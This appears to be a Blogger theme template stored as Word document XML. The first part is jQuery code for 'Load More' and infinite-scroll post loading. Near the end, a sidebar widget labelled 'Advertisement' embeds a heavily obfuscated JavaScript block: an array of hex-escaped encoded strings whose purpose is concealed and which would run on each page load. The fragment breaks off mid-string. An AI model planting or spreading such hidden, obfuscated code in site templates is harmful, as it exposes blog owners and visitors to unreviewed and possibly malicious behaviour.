    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if (loading) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loading = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if (!olderPostsLink) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                $('.melesa-infinite-loading').fadeOut();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                loadMoreDiv.html("&lt;a class=\"disable\" href='javascript:void(0);'&gt;No more posts found.&lt;/a&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv.find('a').hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv.find('img').show();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $.ajax(olderPostsLink, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                'dataType': 'html'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }).done(function(html) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                var newDom = $('&lt;div&gt;&lt;/div&gt;').append(html.replace(rscript, ''));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                var newLink = newDom.find('a.melesa-older-link');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if (newLink) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  olderPostsLink = newLink.attr('href');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  olderPostsLink = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  loadMoreDiv.hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                var newPosts = newDom.find(postContainerSelector).children();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                $(postContainerSelector).append(newPosts);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                //process the posts for formatting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                $(postContainerSelector).find('article.ajax_pickup.hidden').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var clsss = '.' + $(this).attr('data-class');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  post(clsss,postlayout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                // Loaded more posts successfully.  Register this pageview with</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                // Google Analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if (window._gaq) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  window._gaq.push(['_trackPageview', olderPostsLink]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                loadMoreDiv.find('img').hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                loadMoreDiv.find('a').show();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                $('.melesa-infinite-loading').fadeOut();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                loading = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            function getDocumentHeight() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              return Math.max(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                win.height(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                doc.height(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                document.documentElement.clientHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            function handleScroll() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var height = getDocumentHeight();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var pos = win.scrollTop() + win.height();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if (height - pos &lt; 150) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                //loadMore();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            function init() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if (_WidgetManager._GetAllData().blog.pageType == 'item') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              olderPostsLink = $('a.melesa-older-link').attr('href');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if (!olderPostsLink) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              var link = $('&lt;a href="javascript:;"&gt;Load More&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              link.click(loadMore);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var img = $('&lt;div class="melesa-infinite-loading"  style="display: none;"&gt;&lt;div class="lds-ripple"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              win.scroll(handleScroll);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv = $('&lt;div class="melesa-loadmore"&gt;&lt;/div&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv.append(link);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv.append(img);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              loadMoreDiv.insertBefore($('#melesa-pager'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('#melesa-pager').hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $(document).ready(init);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          })(jQuery);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }//if infinite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if(pagit == 'arrow'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //arrow page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#melesa-pager').addClass('arrow');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:section-contents id='sidebar-right-1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='HTML111' locked='false' title='Advertisement' type='HTML'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='content'&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var _0x177b=[&amp;#39;\x4a\x4d\x4f\x7a\x77\x36\x2f\x44\x6d\x38\x4f\x55&amp;#39;,&amp;#39;\x51\x42\x30\x4c\x77\x37\x38\x3d&amp;#39;,&amp;#39;\x55\x7a\x55\x43\x77\x36\x2f\x43\x70\x77\x3d\x3d&amp;#39;,&amp;#39;\x44\x4d\x4f\x62\x53\x4d\x4f\x4a\x77\x37\x63\x3d&amp;#39;,&amp;#39;\x54\x32\x35\x70\x58\x67\x3d\x3d&amp;#39;,&amp;#39;\x4d\x4d\x4b\x59\x46\x68\x55\x5a&amp;#39;,&amp;#39;\x61\x6d\x54\x44\x69\x51\x6e\x43\x70\x77\x3d\x3d&amp;#39;,&amp;#39;\x57\x47\x52\x76\x52\x42\x6c\x54\x65\x41\x3d\x3d&amp;#39;,&amp;#39;\x4f\x73\x4f\x46\x64\x63\x4f\x55\x77\x36\x49\x3d&amp;#39;,&amp;#39;\x52\x46\x58\x44\x6e\x32\x72\x43\x71\x67\x3d\x3d&amp;#39;,&amp;#39;\x77\x6f\x35\x77\x46\x4d\x4b\x71\x77\x35\x73\x3d&amp;#39;,&amp;#39;\x77\x34\x4a\x30\x77\x72\x4a\x68\x42\x67\x3d\x3d&amp;#39;,&amp;#39;\x77\x35\x6e\x44\x68\x63\x4b\x75\x77\x35\x56\x49&amp;#39;,&amp;#39;\x5a\x38\x4f\x63\x77\x35\x4e\x46\x62\x73\x4f\x48\x4e\x38\x4f\x50\x4d\x32\x34\x61&amp;#39;,&amp;#39;\x65\x6a\x73\x77\x77\x35\x6f\x78&amp;#39;,&amp;#39;\x44\x4d\x4b\x58\x64\x73\x4f\x6b\x77\x35\x73\x3d&amp;#39;,&amp;#39;\x77\x72\x6b\x6c\x64\x4d\x4f\x46\x77\x36\x38\x3d&amp;#39;,&amp;#39;\x41\x63\x4b\x64\x59\x73\x4f\x2b\x77\x36\x30\x3d&amp;#39;,&amp;#39;\x47\x73\x4b\x6e\x77\x72\x59\x73\x57\x41\x3d\x3d&amp;#39;,&amp;#39;\x51\x73\x4f\x67\x77\x72\x55\x32\x45\x67\x3d\x3d&amp;#39;,&amp;#39;\x77\x71\x72\x44\x6d\x38\x4f\x64\x49\x4d\x4f\x52&amp;#39;,&amp;#39;\x4d\x4d\x4f\x67\x50\x4d\x4f\x72\x77\x70\x58\x44\x6b\x63\x4b\x35\x77\x37\x50\x44\x70\x4d\x4f\x61\x77\x34\x55\x48\x77\x37\x2f\x43\x6e\x4d\x4f\x30\x77\x71\x58\x44\x6f\x4d\x4b\x4b\x77\x72\x30\x3d&amp;#39;,&amp;#39;\x43\x46\x67\x54\x41\x4d\x4b\x55\x61\x54\x6c\x77\x77\x35\x4a\x52\x77\x71\x46\x39\x53\x6c\x6e\x44\x6c\x6e\x76\x43\x69\x77\x3d\x3d&amp;#39;,&amp;#39;\x63\x42\x67\x42\x77\x72\x54\x43\x75\x51\x3d\x3d&amp;#39;,&amp;#39;\x59\x73\x4f\x44\x49\x73\x4f\x65\x77\x70\x7a\x44\x70\x4d\x4b\x2f\x44\x73\x4f\x77\x77\x37\x48\x43\x71\x77\x50\x44\x76\x77\x3d\x3d&amp;#39;,&amp;#39;\x77\x6f\x4c\x44\x72\x56\x7a\x44\x69\x6e\x6b\x3d&amp;#39;,&amp;#39;\x52\x73\x4b\x66\x77\x6f\x76\x43\x69\x63\x4b\x78&amp;#39;,&amp;#39;\x77\x70\x34\x6e\x59\x79\x35\x70\x77\x36\x62\x44\x6b\x54\x58\x44\x6a\x42\x45\x43\x46\x55\x4e\x4d\x77\x70\x6c\x48\x77\x72\x7a\x44\x6e\x73\x4f\x39\x77\x72\x2f\x43\x6a\x42\x6e\x44\x72\x51\x4c\x44\x70\x79\x54\x44\x6c\x63\x4f\x70\x77\x35\x34\x62\x77\x72\x30\x37&amp;#39;,&amp;#39;\x43\x43\x48\x44\x68\x73\x4b\x52\x77\x70\x30\x3d&amp;#39;,&amp;#39;\x77\x71\x6a\x44\x76\x46\x4c\x44\x6e\x6b\x73\x3d&amp;#39;,&amp;#39;\x77\x71\x44\x44\x6e\x4d\x4b\x69&amp;#39;,&amp;#39;\x77\x72\x7a\x44\x69\x73\x4f\x66\x49\x67\x3d\x3d&amp;#39;,&amp;#39;\x55\x73\x4b\x72\x77\x37\x77\x45\x77\x6f\x59\x3d&amp;#39;,&amp;#39;\x43\x63\x4b\x51\x77\x72\x4d\x4f&amp;#39;,&amp;#39;\x45\x69\x70\x56\x57\x33\x41\x3d&amp;#39;,&amp;#39;\x57\x45\x63\x4b\x63\x4d\x4f\x74&amp;#39;,&amp;#39;\x52\x63\x4b\x2b\x77\x37\x49\x59\x77\x70\x55\x3d&amp;#39;,&amp;#39;\x77\x34\x6a\x44\x73\x38\x4b\x48\x77\x70\x42\x38&amp;#39;,&amp;#39;\x44\x7a\x41\x74\x64\x63\x4f\x44\x5a\x46\x54\x43\x70\x46\x38\x3d&amp;#39;,&amp;#39;\x65\x32\x50\x44\x6d\x53\x49\x3d&amp;#39;,&amp;#39;\x5a\x77\x34\x49\x77\x70\x6e\x43\x69\x41\x3d\x3d&amp;#39;,&amp;#39;\x61\x58\x44\x44\x6d\x53\x50\x43\x6b\x51\x3d\x3d&amp;#39;,&amp;#39;\x4b\x73\x4b\x76\x77\x37\x76\x44\x75\x46\x67\x3d&amp;#39;,&amp;#39;\x77\x36\x33\x43\x74\x63\x4b\x72\x4d\x32\x52\x43\x77\x71\x41\x3d&amp;#39;,&amp;#39;\x53\x45\x39\x6a\x57\x77\x3d\x3d&amp;#39;,&amp;#39;\x51\x47\x50\x44\x6b\x6b\x6e\x43\x68\x46\x52\x49&amp;#39;,&amp;#39;\x77\x71\x62\x44\x6d\x38\x4b\x76\x58\x69\x59\x64\x77\x37\x77\x3d&amp;#39;,&amp;#39;\x59\x63\x4b\x7a\x50\x77\x30\x2f&amp;#39;,&amp;#39;\x5a\x38\x4f\x63\x77\x35\x4e\x46\x64\x63\x4f\x5a\x4a\x77\x3d\x3d&amp;#39;,&amp;#39;\x77\x35\x72\x44\x74\x4d\x4b\x74\x77\x34\x34\x3d&amp;#39;,&amp;#39;\x77\x71\x2f\x44\x6e\x4d\x4b\x72\x77\x72\x4a\x46\x77\x71\x50\x43\x6d\x67\x3d\x3d&amp;#39;,&amp;#39;\x77\x71\x66\x44\x68\x4d\x4f\x4b&amp;#39;,&amp;#39;\x77\x35\x5a\x76\x44\x38\x4b\x47\x63\x4d\x4f\x5a\x77\x70\x59\x3d&amp;#39;,&amp;#39;\x41\x73\x4b\x6f\x77\x35\x4c\x43\x67\x54\x30\x3d&amp;#39;,&amp;#39;\x77\x71\x6a\x44\x74\x31\x54\x44\x6f\x33\x44\x44\x72\x63\x4f\x65&amp;#39;,&amp;#39;\x77\x35\x42\x34\x41\x73\x4b\x51\x62\x38\x4f\x42\x77\x70\x72\x44\x6f\x48\x6b\x3d&amp;#39;,&amp;#39;\x4f\x4d\x4b\x6c\x4a\x42\x52\x74\x50\x73\x4b\x48\x52\x63\x4f\x69\x77\x71\x48\x44\x69\x48\x52</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">\x34\x77\x37\x44\x44\x71\x63\x4f\x32\x77\x72\x68\x30\x42\x42\x4c\x43\x6c\x54\x6e\x43\x69\x56\x64\x38\x49\x31\x66\x43\x6a\x31\x6b\x65\x52\x38\x4f\x55\x77\x34\x35\x2f\x41\x63\x4f\x31\x77\x72\x44\x44\x70\x32\x46\x4a\x43\x69\x41\x78\x77\x6f\x67\x42\x77\x6f\x46\x54\x77\x70\x76\x43\x76\x63\x4b\x49\x65\x38\x4f\x75\x77\x6f\x33\x44\x71\x6e\x76\x44\x72\x63\x4b\x49\x45\x63\x4f\x51\x77\x72\x66\x43\x76\x73\x4b\x66\x50\x33\x39\x46\x44\x4d\x4f\x6d\x49\x73\x4f\x57\x4c\x6c\x6e\x43\x69\x73\x4b\x41\x77\x36\x37\x44\x6e\x4d\x4b\x49\x77\x36\x58\x43\x6c\x63\x4f\x4e\x77\x36\x50\x43\x6f\x6c\x49\x56\x77\x35\x50\x43\x6f\x4d\x4f\x45\x64\x73\x4f\x70\x77\x36\x38\x31\x77\x36\x54\x44\x6a\x73\x4b\x36\x49\x63\x4b\x48\x52\x63\x4f\x71\x77\x6f\x55\x76\x66\x4d\x4f\x69\x77\x36\x6c\x30\x77\x34\x38\x62\x47\x73\x4f\x38\x77\x70\x7a\x43\x72\x48\x72\x44\x6e\x73\x4b\x57\x47\x73\x4b\x35\x77\x6f\x59\x73\x4e\x4d\x4f\x62\x66\x63\x4f\x5a\x4c\x58\x41\x4f\x59\x4d\x4b\x71\x50\x54\x42\x45\x4c\x77\x6a\x43\x70\x73\x4b\x4c\x77\x36\x39\x62\x77\x70\x70\x48\x62\x4d\x4f\x65\x77\x72\x49\x66\x77\x71\x72\x44\x75\x54\x63\x3d&amp;#39;,&amp;#39;\x77\x72\x6a\x44\x72\x45\x6a\x44\x75\x58\x48\x44\x70\x67\x3d\x3d&amp;#39;,&amp;#39;\x4d\x73\x4b\x66\x56\x4d\x4f\x53\x77\x35\x70\x67\x65\x38\x4f\x51\x77\x37\x4c\x43\x6c\x45\x62\x43\x71\x38\x4b\x62\x64\x6e\x63\x3d&amp;#39;,&amp;#39;\x4a\x54\x44\x44\x6f\x73\x4b\x69\x77\x71\x54\x43\x74\x51\x3d\x3d&amp;#39;,&amp;#39;\x45\x73\x4b\x2f\x77\x35\x48\x43\x6c\x77\x3d\x3d&amp;#39;,&amp;#39;\x65\x38\x4b\x62\x77\x71\x62\x43\x75\x41\x3d\x3d&amp;#39;,&amp;#39;\x61\x30\x6b\x74\x77\x71\x52\x2f\x77\x36\x38\x3d&amp;#39;,&amp;#39;\x42\x63\x4b\x75\x77\x35\x4c\x43\x6c\x6a\x33\x43\x75\x52\x35\x63\x42\x48\x7a\x43\x68\x41\x3d\x3d&amp;#39;,&amp;#39;\x54\x63\x4b\x78\x77\x71\x44\x43\x71\x63\x4b\x35&amp;#39;,&amp;#39;\x51\x4d\x4f\x2f\x77\x71\x73\x70\x48\x32\x37\x43\x6a\x43\x4c\x43\x75\x56\x54\x44\x72\x77\x3d\x3d&amp;#39;,&amp;#39;\x56\x63\x4f\x43\x77\x35\x35\x68\x62\x51\x3d\x3d&amp;#39;,&amp;#39;\x57\x63\x4f\x46\x77\x36\x66\x44\x72\x54\x6b\x3d&amp;#39;,&amp;#39;\x4c\x63\x4f\x6a\x77\x34\x7a\x44\x76\x63\x4f\x4c&amp;#39;,&amp;#39;\x77\x35\x31\x68\x66\x55\x4d\x68&amp;#39;,&amp;#39;\x66\x56\x35\x4d\x4f\x4d\x4f\x31&amp;#39;,&amp;#39;\x49\x73\x4b\x52\x77\x71\x63\x57\x61\x41\x3d\x3d&amp;#39;,&amp;#39;\x62\x32\x33\x44\x68\x54\x2f\x43\x6c\x78\x58\x43\x70\x44\x37\x44\x73\x79\x30\x77&amp;#39;,&amp;#39;\x77\x36\x4e\x57\x77\x37\x56\x7a\x77\x37\x4d\x3d&amp;#39;,&amp;#39;\x44\x38\x4b\x4e\x77\x71\x62\x44\x74\x63\x4f\x46&amp;#39;,&amp;#39;\x77\x35\x54\x44\x76\x73\x4b\x30\x77\x71\x52\x4f&amp;#39;,&amp;#39;\x56\x63\x4b\x76\x77\x37\x49\x64&amp;#39;,&amp;#39;\x44\x51\x6c\x58\x53\x32\x4d\x3d&amp;#39;,&amp;#39;\x77\x71\x6a\x44\x68\x4d\x4f\x44\x50\x38\x4f\x63\x55\x68\x44\x43\x68\x73\x4f\x33\x62\x44\x49\x3d&amp;#39;,&amp;#39;\x77\x35\x6e\x44\x6e\x73\x4b\x57\x77\x71\x4e\x59&amp;#39;,&amp;#39;\x41\x63\x4b\x71\x41\x51\x49\x42&amp;#39;,&amp;#39;\x77\x71\x33\x44\x67\x38\x4b\x31\x77\x71\x31\x54&amp;#39;,&amp;#39;\x56\x69\x38\x70\x77\x36\x44\x43\x67\x67\x3d\x3d&amp;#39;,&amp;#39;\x64\x63\x4b\x54\x43\x78\x59\x4d&amp;#39;,&amp;#39;\x43\x4d\x4b\x43\x4a\x52\x4c\x43\x73\x67\x3d\x3d&amp;#39;,&amp;#39;\x44\x73\x4f\x55\x41\x73\x4f\x51\x77\x70\x49\x3d&amp;#39;,&amp;#39;\x41\x38\x4b\x5a\x4e\x43\x6e\x43\x72\x77\x3d\x3d&amp;#39;,&amp;#39;\x61\x31\x6f\x70\x77\x71\x46\x70&amp;#39;,&amp;#39;\x77\x71\x41\x7